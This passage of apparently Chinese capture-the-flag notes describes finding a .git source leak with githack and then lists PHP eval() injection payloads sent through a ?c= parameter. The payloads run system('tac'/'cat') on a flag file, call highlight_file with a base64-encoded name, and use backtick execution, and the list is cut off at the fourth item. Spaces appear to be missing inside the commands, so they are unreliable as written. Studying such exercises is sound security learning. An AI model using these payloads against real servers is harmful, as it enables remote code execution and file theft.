这题用御剑扫描不出来什么结果，最后看大佬的wp发现这题使用githack扫出来的首先来收一下git源码泄露的原因：开发人员在开发的时候，常常会先把源码提交到远程托管网站（如github），最后在从远程托管网站把源码pull到服务器的web目录下，如果忘记把.git文件删除，就会造成此漏洞。利用.git

一、eval()函数调用--无严格过滤：1、highlight_file()高亮显示：?c=highlight_file(base64_decode("ZmxhZy5waHA="));2、shell命令：?c=system("tacfl*g.php");?c=system("catfl*g.php");3、echo直接打印：(使用反引号包裹shell命令)?c=echo'tacfla*.php';4、